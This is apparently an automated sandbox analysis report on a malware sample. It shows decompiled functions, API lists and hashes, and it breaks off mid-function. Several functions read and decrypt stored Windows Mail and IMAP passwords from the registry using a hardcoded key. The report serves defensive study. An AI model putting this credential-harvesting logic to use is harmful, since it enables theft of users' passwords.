Opcode Fuzzy Hash: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
Instruction Fuzzy Hash: C3415FB284021D7ADF21EB55DC41FEB776CAF44344F0401FBBA09A2152E6389F988FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0DA, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E0DA() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t4;

				if( *0x417518 != 0) {
					return _t1;
				}
				_t2 = LoadLibraryA("psapi.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
					 *0x416fec = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "EnumProcessModules");
						 *0x416fe4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
							 *0x416fdc = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "EnumProcesses");
								 *0x41710c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t4, "GetModuleInformation");
									 *0x416fe8 = _t2;
									if(_t2 != 0) {
										 *0x417518 = 1;
									}
								}
							}
						}
					}
					if( *0x417518 == 0) {
						_t2 = FreeLibrary(_t4);
					}
					goto L10;
				}
			}

0x0040e0e1
0x0040e171
0x0040e171
0x0040e0ed
0x0040e0f3
0x0040e0f7
0x0040e170
0x00000000
0x0040e0f9
0x0040e106
0x0040e10a
0x0040e10f
0x0040e117
0x0040e11b
0x0040e120
0x0040e128
0x0040e12c
0x0040e131
0x0040e139
0x0040e13d
0x0040e142
0x0040e14a
0x0040e14e
0x0040e153
0x0040e155
0x0040e155
0x0040e153
0x0040e142
0x0040e131
0x0040e120
0x0040e167
0x0040e16a
0x0040e16a
0x00000000
0x0040e167

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,0040DD12), ref: 0040E0ED
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E106
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E117
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E128
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E139
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E14A
FreeLibrary.KERNEL32(00000000), ref: 0040E16A

Strings

psapi.dll, xrefs: 0040E0E8
GetModuleFileNameExA, xrefs: 0040E122
EnumProcessModules, xrefs: 0040E111
EnumProcesses, xrefs: 0040E133
GetModuleBaseNameA, xrefs: 0040E100
GetModuleInformation, xrefs: 0040E144

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
API String ID: 2449869053-232097475
Opcode ID: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
Instruction ID: ee37d54ff12c00b719d991246764d0af3e5b6fb2a2d0f9e8910a6c9c4b0fdd5c
Opcode Fuzzy Hash: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
Instruction Fuzzy Hash: F0015E31740311EAC711EB266D40FE73EB85B48B91B11843BE544E52A4D778C5928A6C

Uniqueness

Uniqueness Score: -1.00%

Function 00410525, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00410525(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v6;
				char _v7;
				char _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				short* _v24;
				unsigned int _v28;
				char* _v32;
				int _v36;
				intOrPtr _v40;
				signed int _v44;
				void _v299;
				char _v300;
				void _v555;
				char _v556;
				char _v1080;
				void* __esi;
				int _t56;
				intOrPtr _t58;
				intOrPtr _t64;
				char _t92;
				char* _t93;
				void* _t100;
				signed int _t102;
				signed int _t107;
				intOrPtr _t108;
				void* _t113;

				_t113 = __eflags;
				_t100 = __edx;
				_t93 = __eax;
				E004046D7( &_v1080);
				if(E004047A0( &_v1080, _t113) != 0) {
					_t56 = strlen(_t93);
					asm("cdq");
					_t107 = _t56 - _t100 >> 1;
					_t2 = _t107 + 1; // 0x1
					_t58 = _t2;
					L004115D0();
					_t102 = 0;
					_t96 = _t58;
					_v16 = _t58;
					if(_t107 > 0) {
						do {
							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
							_v7 = _t93[1 + _t102 * 2];
							_v6 = 0;
							_t92 = E00406512( &_v8);
							_t96 = _v16;
							 *((char*)(_t102 + _v16)) = _t92;
							_t102 = _t102 + 1;
						} while (_t102 < _t107);
					}
					_v556 = 0;
					memset( &_v555, 0, 0xff);
					_v12 = 0;
					_v300 = 0;
					memset( &_v299, 0, 0xfe);
					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
					if(_t64 != 1) {
						__eflags = _t64 - 2;
						if(_t64 == 2) {
							_push("Software\\Microsoft\\Windows Live Mail");
							goto L7;
						}
					} else {
						_push("Software\\Microsoft\\Windows Mail");
						L7:
						strcpy( &_v300, ??);
						_pop(_t96);
					}
					if(E0040EB3F(0x80000001,  &_v300,  &_v20) == 0) {
						_v12 = 0xff;
						E0040EBA3(_t96, _v20, "Salt",  &_v556,  &_v12);
						RegCloseKey(_v20);
					}
					_v40 = _v16;
					_v36 = _v12;
					_v32 =  &_v556;
					_v44 = _t107;
					if(E00404811( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
						_t108 = _a8;
						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
						(_t108 + 0x400)[_v28 >> 1] = 0;
						LocalFree(_v24);
					}
					_push(_v16);
					L004115D6();
				}
				return E004047F1( &_v1080);
			}

0x00410525
0x00410525
0x00410536
0x00410538
0x00410544
0x0041054c
0x00410551
0x00410556
0x00410558
0x00410558
0x0041055c
0x00410562
0x00410566
0x00410567
0x0041056a
0x0041056c
0x0041056f
0x00410576
0x0041057d
0x00410581
0x00410587
0x0041058a
0x0041058d
0x0041058e
0x0041056c
0x004105a1
0x004105a8
0x004105bc
0x004105bf
0x004105c5
0x004105cd
0x004105d9
0x004105e2
0x004105e5
0x004105e7
0x00000000
0x004105e7
0x004105db
0x004105db
0x004105ec
0x004105f3
0x004105f9
0x004105f9
0x00410614
0x00410629
0x0041062c
0x00410637
0x00410637
0x00410640
0x00410646
0x0041064f
0x00410664
0x0041066e
0x00410670
0x00410688
0x00410693
0x0041069d
0x0041069d
0x004106a3
0x004106a6
0x004106ac
0x004106bb

APIs

Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726

Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,74B5F420), ref: 004047A8
Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0

strlen.MSVCRT ref: 0041054C
??2@YAPAXI@Z.MSVCRT ref: 0041055C
memset.MSVCRT ref: 004105A8
memset.MSVCRT ref: 004105C5
strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 004105F3
RegCloseKey.ADVAPI32(?), ref: 00410637
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410688
LocalFree.KERNEL32(?), ref: 0041069D
??3@YAXPAX@Z.MSVCRT ref: 004106A6

Part of subcall function 00406512: strtoul.MSVCRT ref: 0040651A

Strings

Software\Microsoft\Windows Mail, xrefs: 004105DB
Software\Microsoft\Windows Live Mail, xrefs: 004105E7
Salt, xrefs: 00410621

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
API String ID: 1673043434-2687544566
Opcode ID: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
Instruction ID: 7afd7cd9a60bb03764dcbc3854d87102a14f95683297c5d7d0928fc071fa2b2b
Opcode Fuzzy Hash: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
Instruction Fuzzy Hash: D14186B2C0011CAECB11DBA5DC81ADEBBBCAF48344F1041ABE645F3251DA349A95CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBA7, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040CBA7(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void _v619;
				char _v620;
				void _v1231;
				char _v1232;
				void* __edi;
				void* _t37;
				void* _t53;
				char* _t54;
				intOrPtr _t60;
				void* _t61;
				char* _t62;
				void* _t67;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t87;
				void* _t88;
				void* _t89;

				_t87 = _a4;
				_t84 = __ecx;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
					_t37 = 0;
				} else {
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
				}
				_push(0xa);
				_push("mailbox://");
				_push(_t37);
				L00411612();
				_t89 = _t88 + 0xc;
				if(_t37 == 0) {
					L8:
					_a4 = 0;
					if( *((intOrPtr*)(_t84 + 0x474)) > 0) {
						while(1) {
							_t85 = E0040D438(_a4, _t84 + 0x468);
							_v620 = 0;
							memset( &_v619, 0, 0x261);
							_v1232 = 0;
							memset( &_v1231, 0, 0x261);
							_t17 = _t85 + 0x104; // 0x104
							_t18 = _t85 + 0x204; // 0x204
							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
							_t20 = _t85 + 0x104; // 0x104
							_t21 = _t85 + 0x204; // 0x204
							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
							_t53 = 0;
							_t89 = _t89 + 0x38;
							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
								_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
							}
							_push(_t53);
							_t54 =  &_v620;
							_push(_t54);
							L004115B2();
							if(_t54 == 0) {
								goto L17;
							}
							_t61 = 0;
							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
							}
							_push(_t61);
							_t62 =  &_v1232;
							_push(_t62);
							L004115B2();
							if(_t62 != 0) {
								L18:
								_a4 = _a4 + 1;
								_t60 = _v8;
								if(_a4 <  *((intOrPtr*)(_t60 + 0x474))) {
									_t84 = _t60;
									continue;
								} else {
								}
							} else {
								goto L17;
							}
							goto L21;
							L17:
							if( *((char*)(E00406B0F( *((intOrPtr*)(_t87 + 0x1c)) - 1, _t87))) == 0x7e) {
								E00401380(_t57 + 1, _t85 + 0x304, 0xff);
							} else {
								goto L18;
							}
							goto L21;
						}
					}
				} else {
					if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
						_t67 = 0;
					} else {
						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
					}
					_push(7);
					_push("imap://");
					_push(_t67);
					L00411612();
					_t89 = _t89 + 0xc;
					if(_t67 == 0) {
						goto L8;
					}
				}
				L21:
				return 1;
			}

0x0040cbb2
0x0040cbbb
0x0040cbbd
0x0040cbc0
0x0040cbcc
0x0040cbc2
0x0040cbc7
0x0040cbc7
0x0040cbce
0x0040cbd0
0x0040cbd5
0x0040cbd6
0x0040cbdb
0x0040cbe0
0x0040cc0b
0x0040cc11
0x0040cc14
0x0040cc23
0x0040cc32
0x0040cc3d
0x0040cc44
0x0040cc53
0x0040cc5a
0x0040cc5f
0x0040cc66
0x0040cc79
0x0040cc7e
0x0040cc85
0x0040cc98
0x0040cc9d
0x0040cc9f
0x0040cca5
0x0040ccac
0x0040ccac
0x0040ccaf
0x0040ccb0
0x0040ccb6
0x0040ccb7
0x0040ccc0
0x00000000
0x00000000
0x0040ccc2
0x0040ccc7
0x0040ccce
0x0040ccce
0x0040ccd1
0x0040ccd2
0x0040ccd8
0x0040ccd9
0x0040cce2
0x0040ccf4
0x0040ccf4
0x0040ccf7
0x0040cd03
0x0040cc21
0x00000000
0x00000000
0x0040cd09
0x00000000
0x00000000
0x00000000
0x00000000
0x0040cce4
0x0040ccf2
0x0040cd17
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ccf2
0x0040cc23
0x0040cbe2
0x0040cbe5
0x0040cbf1
0x0040cbe7
0x0040cbec
0x0040cbec
0x0040cbf3
0x0040cbf5
0x0040cbfa
0x0040cbfb
0x0040cc00
0x0040cc05
0x00000000
0x00000000
0x0040cc05
0x0040cd1e
0x0040cd24

APIs

_strnicmp.MSVCRT ref: 0040CBD6
_strnicmp.MSVCRT ref: 0040CBFB
memset.MSVCRT ref: 0040CC44
memset.MSVCRT ref: 0040CC5A
sprintf.MSVCRT ref: 0040CC79
sprintf.MSVCRT ref: 0040CC98
_stricmp.MSVCRT(00000000,00000000), ref: 0040CCB7
_stricmp.MSVCRT(00000000,00000000), ref: 0040CCD9

Part of subcall function 00401380: strlen.MSVCRT ref: 0040138D

Strings

mailbox://, xrefs: 0040CBD0
imap://, xrefs: 0040CBF5
imap://%s@%s, xrefs: 0040CC92
mailbox://%s@%s, xrefs: 0040CC73

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _stricmp_strnicmpmemsetsprintf$strlen
String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
API String ID: 4281260487-2229823034
Opcode ID: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
Instruction ID: 9e102a0fb77db954c7e66e430d6901f6f24083c0ab16dd7aca32eaa7b9d40139
Opcode Fuzzy Hash: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
Instruction Fuzzy Hash: B84163B1604205EFD724DB69C881F96B7E8AF04344F144A7BEA4AE7281D738FA448B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBA5, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040CBA5(void* __eax, intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void _v619;
				char _v620;
				void _v1231;
				char _v1232;
				void* __edi;
				void* _t39;
				void* _t55;
				char* _t56;
				intOrPtr _t62;
				void* _t63;
				char* _t64;
				void* _t69;
				intOrPtr _t89;
				void* _t91;
				intOrPtr _t94;
				void* _t99;
				void* _t100;
				void* _t101;

				_t100 = _t99 - 0x4cc;
				_t94 = _a4;
				_t89 = __ecx;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
					_t39 = 0;
				} else {
					_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
				}
				_push(0xa);
				_push("mailbox://");
				_push(_t39);
				L00411612();
				_t101 = _t100 + 0xc;
				if(_t39 == 0) {
					L9:
					_a4 = 0;
					if( *((intOrPtr*)(_t89 + 0x474)) > 0) {
						while(1) {
							_t91 = E0040D438(_a4, _t89 + 0x468);
							_v620 = 0;
							memset( &_v619, 0, 0x261);
							_v1232 = 0;
							memset( &_v1231, 0, 0x261);
							_t17 = _t91 + 0x104; // 0x104
							_t18 = _t91 + 0x204; // 0x204
							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
							_t20 = _t91 + 0x104; // 0x104
							_t21 = _t91 + 0x204; // 0x204
							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
							_t55 = 0;
							_t101 = _t101 + 0x38;
							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
								_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
							}
							_push(_t55);
							_t56 =  &_v620;
							_push(_t56);
							L004115B2();
							if(_t56 == 0) {
								goto L18;
							}
							_t63 = 0;
							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
							}
							_push(_t63);
							_t64 =  &_v1232;
							_push(_t64);
							L004115B2();
							if(_t64 != 0) {
								L19:
								_a4 = _a4 + 1;
								_t62 = _v8;
								if(_a4 <  *((intOrPtr*)(_t62 + 0x474))) {
									_t89 = _t62;
									continue;
								} else {
								}
							} else {
								goto L18;
							}
							goto L22;
							L18:
							if( *((char*)(E00406B0F( *((intOrPtr*)(_t94 + 0x1c)) - 1, _t94))) == 0x7e) {
								E00401380(_t59 + 1, _t91 + 0x304, 0xff);
							} else {
								goto L19;
							}
							goto L22;
						}
					}
				} else {
					if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
						_t69 = 0;
					} else {
						_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
					}
					_push(7);
					_push("imap://");
					_push(_t69);
					L00411612();
					_t101 = _t101 + 0xc;
					if(_t69 == 0) {
						goto L9;
					}
				}
				L22:
				return 1;
			}

0x0040cbaa
0x0040cbb2
0x0040cbbb
0x0040cbbd
0x0040cbc0
0x0040cbcc
0x0040cbc2
0x0040cbc7
0x0040cbc7
0x0040cbce
0x0040cbd0
0x0040cbd5
0x0040cbd6
0x0040cbdb
0x0040cbe0
0x0040cc0b
0x0040cc11
0x0040cc14
0x0040cc23
0x0040cc32
0x0040cc3d
0x0040cc44
0x0040cc53
0x0040cc5a
0x0040cc5f
0x0040cc66
0x0040cc79
0x0040cc7e
0x0040cc85
0x0040cc98
0x0040cc9d
0x0040cc9f
0x0040cca5
0x0040ccac
0x0040ccac
0x0040ccaf
0x0040ccb0
0x0040ccb6
0x0040ccb7
0x0040ccc0
0x00000000
0x00000000
0x0040ccc2
0x0040ccc7
0x0040ccce
0x0040ccce
0x0040ccd1
0x0040ccd2
0x0040ccd8
0x0040ccd9
0x0040cce2
0x0040ccf4
0x0040ccf4
0x0040ccf7
0x0040cd03
0x0040cc21
0x00000000
0x00000000
0x0040cd09
0x00000000
0x00000000
0x00000000
0x00000000
0x0040cce4
0x0040ccf2
0x0040cd17
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ccf2
0x0040cc23
0x0040cbe2
0x0040cbe5
0x0040cbf1
0x0040cbe7
0x0040cbec
0x0040cbec
0x0040cbf3
0x0040cbf5
0x0040cbfa
0x0040cbfb
0x0040cc00
0x0040cc05
0x00000000
0x00000000
0x0040cc05
0x0040cd1d
0x0040cd24

APIs

_strnicmp.MSVCRT ref: 0040CBD6
_strnicmp.MSVCRT ref: 0040CBFB
memset.MSVCRT ref: 0040CC44
memset.MSVCRT ref: 0040CC5A
sprintf.MSVCRT ref: 0040CC79
sprintf.MSVCRT ref: 0040CC98
_stricmp.MSVCRT(00000000,00000000), ref: 0040CCB7
_stricmp.MSVCRT(00000000,00000000), ref: 0040CCD9

Strings

mailbox://, xrefs: 0040CBD0
imap://, xrefs: 0040CBF5
imap://%s@%s, xrefs: 0040CC92
mailbox://%s@%s, xrefs: 0040CC73

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _stricmp_strnicmpmemsetsprintf
String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
API String ID: 2822975062-2229823034
Opcode ID: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
Instruction ID: 56d5f4bbafa72d85e66e322173295d9522024af121689b7315c9fa9ceefdefbd
Opcode Fuzzy Hash: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
Instruction Fuzzy Hash: 754150B1604605EFD724DB69C8C1F96B7E8AF04304F14466BEA4AE7281D738FA45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D6FB, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 118
registryCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040D6FB(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
				int _v8;
				int _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char* _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				int _v44;
				void _v299;
				char _v300;
				char _v556;
				char _v812;
				char _v4908;
				void* __ebx;
				void* __edi;
				long _t46;
				int* _t84;
				char* _t85;

				E004118A0(0x132c, __ecx);
				_t84 = 0;
				_t46 = RegOpenKeyExA(_a16, "Creds", 0, 0x20019,  &_a16);
				if(_t46 != 0) {
					return _t46;
				}
				_v300 = _t46;
				memset( &_v299, 0, 0xff);
				_push(0xff);
				_push( &_v300);
				_v8 = 0;
				_push(0);
				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {
					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
						_v12 = 0x1000;
						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
							_v32 = _v12;
							_v28 =  &_v4908;
							_v40 = _a12;
							_v36 = _a8;
							if(E00404811(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
								_t85 =  &_v812;
								_v812 = 0;
								_v556 = 0;
								E004060D0(0xff, _t85,  &_v300);
								WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0);
								 *((intOrPtr*)( *_a4))(_t85);
								LocalFree(_v20);
								_t84 = 0;
							}
						}
						RegCloseKey(_v16);
					}
					_v8 = _v8 + 1;
					_push(0xff);
					_push( &_v300);
					_push(_v8);
				}
				return RegCloseKey(_a16);
			}

0x0040d703
0x0040d71a
0x0040d725
0x0040d729
0x0040d862
0x0040d862
0x0040d735
0x0040d743
0x0040d74b
0x0040d752
0x0040d753
0x0040d756
0x0040d844
0x0040d774
0x0040d792
0x0040d7a1
0x0040d7aa
0x0040d7b3
0x0040d7b9
0x0040d7bf
0x0040d7db
0x0040d7e4
0x0040d7ea
0x0040d7f1
0x0040d7f8
0x0040d812
0x0040d820
0x0040d825
0x0040d82b
0x0040d82b
0x0040d7db
0x0040d830
0x0040d830
0x0040d836
0x0040d839
0x0040d840
0x0040d841
0x0040d841
0x00000000

APIs

RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
memset.MSVCRT ref: 0040D743
RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040D770
RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040D799
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040D812
LocalFree.KERNEL32(?), ref: 0040D825
RegCloseKey.ADVAPI32(?), ref: 0040D830
RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
RegCloseKey.ADVAPI32(?), ref: 0040D858

Strings

Creds, xrefs: 0040D71D
%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd, xrefs: 0040D710
ps:password, xrefs: 0040D78A

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
API String ID: 551151806-1288872324
Opcode ID: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
Instruction ID: ba0b8c8cecfa7ea512c31dd79fcda3fb233e403caecda4e29e00fc0c4110e127
Opcode Fuzzy Hash: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
Instruction Fuzzy Hash: 864129B2900209AFDB11DF95DD84EEFBBBCEB48344F0041A6FA15E2150DA749A94CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004080A3, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86
windowCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E004080A3(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
				void _v4103;
				char _v4104;
				char _t30;
				struct HMENU__* _t32;
				char _t39;
				void* _t42;
				struct HWND__* _t43;
				struct HMENU__* _t48;

				_t42 = __edi;
				_t38 = __ecx;
				E004118A0(0x1004, __ecx);
				_t55 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t39 =  *0x417488;
						__eflags = _t39;
						if(_t39 == 0) {
							L8:
							_push(_t42);
							sprintf(0x4172c0, "dialog_%d", _a12);
							_t43 = CreateDialogParamA(_a4, _a12, 0, E0040809E, 0);
							_v4104 = 0;
							memset( &_v4103, 0, 0x1000);
							GetWindowTextA(_t43,  &_v4104, 0x1000);
							__eflags = _v4104;
							if(__eflags != 0) {
								E00407E55(__eflags, "caption",  &_v4104);
							}
							EnumChildWindows(_t43, E00407FEB, 0);
							DestroyWindow(_t43);
						} else {
							while(1) {
								_t30 =  *_t39;
								__eflags = _t30;
								if(_t30 == 0) {
									goto L8;
								}
								__eflags = _t30 - _a12;
								if(_t30 != _a12) {
									_t39 = _t39 + 4;
									__eflags = _t39;
									continue;
								}
								goto L11;
							}
							goto L8;
						}
						L11:
					}
				} else {
					sprintf(0x4172c0, "menu_%d", _a12);
					_t32 = LoadMenuA(_a4, _a12);
					 *0x4171b4 =  *0x4171b4 & 0x00000000;
					_t48 = _t32;
					_push(1);
					_push(_t48);
					_push(_a12);
					E00407EFB(_t38, _t55);
					DestroyMenu(_t48);
				}
				return 1;
			}

0x004080a3
0x004080a3
0x004080ab
0x004080b0
0x004080b5
0x004080fb
0x004080ff
0x00408105
0x0040810e
0x00408110
0x00408126
0x00408126
0x00408134
0x00408155
0x0040815f
0x00408165
0x00408176
0x0040817c
0x00408182
0x00408190
0x00408196
0x0040819e
0x004081a5
0x00408112
0x00408120
0x00408120
0x00408122
0x00408124
0x00000000
0x00000000
0x00408114
0x00408117
0x0040811d
0x0040811d
0x00000000
0x0040811d
0x00000000
0x00408117
0x00000000
0x00408120
0x004081ac
0x004081ac
0x004080b7
0x004080c4
0x004080d2
0x004080d8
0x004080df
0x004080e1
0x004080e3
0x004080e4
0x004080e7
0x004080f0
0x004080f0
0x004081b2

APIs

sprintf.MSVCRT ref: 004080C4
LoadMenuA.USER32 ref: 004080D2

Part of subcall function 00407EFB: GetMenuItemCount.USER32 ref: 00407F10
Part of subcall function 00407EFB: memset.MSVCRT ref: 00407F31
Part of subcall function 00407EFB: GetMenuItemInfoA.USER32 ref: 00407F6C
Part of subcall function 00407EFB: strchr.MSVCRT ref: 00407F83

DestroyMenu.USER32(00000000), ref: 004080F0
sprintf.MSVCRT ref: 00408134
CreateDialogParamA.USER32(?,00000000,00000000,0040809E,00000000), ref: 00408149
memset.MSVCRT ref: 00408165
GetWindowTextA.USER32 ref: 00408176
EnumChildWindows.USER32 ref: 0040819E
DestroyWindow.USER32(00000000), ref: 004081A5

Strings

dialog_%d, xrefs: 0040812A
menu_%d, xrefs: 004080BA
caption, xrefs: 0040818B

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
String ID: caption$dialog_%d$menu_%d
API String ID: 3259144588-3822380221
Opcode ID: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
Instruction ID: 30012a8f5e5a5bdbe68f816da8837f1ba63c4ed8b40bd3c0dd12f77501d21500
Opcode Fuzzy Hash: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
Instruction Fuzzy Hash: 14212172544248BBDB22AF60DD41EEF3B78EF05305F00407AFA41A2190DABC9DA58B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E056, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E056() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x417514 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleA("kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
